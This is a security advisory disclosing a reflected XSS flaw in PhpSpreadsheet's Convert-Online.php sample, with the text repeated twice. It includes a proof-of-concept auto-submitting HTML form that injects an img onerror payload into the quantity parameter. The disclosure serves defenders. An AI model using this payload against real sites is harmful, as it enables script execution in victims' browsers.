Headline
GHSA-x88g-h956-m5xg: Phpspreadsheet allows unauthorized Reflected XSS in `Convert-Online.php` file
Unauthorized Reflected XSS in Convert-Online.php file
Product: Phpspreadsheet
Version: version 3.6.0
CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
CVSS vector v.3.1: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)
CVSS vector v.4.0: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L)
Description: using the /vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php script, an attacker can perform a XSS-type attack
Impact: executing arbitrary JavaScript code in the browser
Vulnerable component: the /vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php file
Exploitation conditions: an unauthorized user
Mitigation: sanitization of the quantity variable
Researcher: Aleksey Solovev (Positive Technologies)
Research
The researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in Convert-Online.php file) in Phpspreadsheet.
There is no sanitization in the /vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php file, which leads to the possibility of a XSS attack.
Figure 4. The message with the quantity parameter is displayed without sanitization
The following figure shows a POST HTTP-request and a response to the server with the variable quantity, which is displayed in the response from the server without sanitization.
<img width="460" alt="fig5" src="https://github.com/user-attachments/assets/022323c9-ca1e-44ea-9380-37ed7848e971" />
Figure 5. In the server’s response , the quantity variable is displayed without sanitization
An attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.
Listing 3. HTML form that demonstrates the exploitation of the XSS vulnerability
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://192.***.***.***/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php" method="POST">
<input type="hidden" name="category" value="Weight and Mass" />
<input type="hidden" name="quantity" value="1.0<img src=1 onerror=alert()>" />
<input type="hidden" name="fromUnit" value="g" />
<input type="hidden" name="toUnit" value="g" />
<input type="hidden" name="submitx" value="Convert" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
After the user visits the attacker’s resource, the form will be sent to the vulnerable scenario, which will lead to the execution of arbitrary code in the client’s browser.
<img width="389" alt="fig6" src="https://github.com/user-attachments/assets/e52b68c6-5a98-4db2-85ec-5bf37e4cb625" />
Figure 6. Executing arbitrary JavaScript code
Credit
This vulnerability was discovered by Aleksey Solovev (Positive Technologies)
Unauthorized Reflected XSS in Convert-Online.php file
Product: Phpspreadsheet
Version: version 3.6.0
CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
CVSS vector v.3.1: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)
CVSS vector v.4.0: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L)
Description: using the /vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php script, an attacker can perform a XSS-type attack
Impact: executing arbitrary JavaScript code in the browser
Vulnerable component: the /vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php file
Exploitation conditions: an unauthorized user
Mitigation: sanitization of the quantity variable
Researcher: Aleksey Solovev (Positive Technologies)
Research
The researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in Convert-Online.php file) in Phpspreadsheet.
There is no sanitization in the /vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php file, which leads to the possibility of a XSS attack.
Figure 4. The message with the quantity parameter is displayed without sanitization
The following figure shows a POST HTTP-request and a response to the server with the variable quantity, which is displayed in the response from the server without sanitization.
Figure 5. In the server’s response , the quantity variable is displayed without sanitization
An attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.
Listing 3. HTML form that demonstrates the exploitation of the XSS vulnerability
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://192.***.***.***/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php" method="POST">
<input type="hidden" name="category" value="Weight and Mass" />
<input type="hidden" name="quantity" value="1.0<img src=1 onerror=alert()>" />
<input type="hidden" name="fromUnit" value="g" />
<input type="hidden" name="toUnit" value="g" />
<input type="hidden" name="submitx" value="Convert" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
After the user visits the attacker’s resource, the form will be sent to the vulnerable scenario, which will lead to the execution of arbitrary code in the client’s browser.
Figure 6. Executing arbitrary JavaScript code
Credit
This vulnerability was discovered by Aleksey Solovev (Positive Technologies)
References
- GHSA-x88g-h956-m5xg
- PHPOffice/PhpSpreadsheet@700a803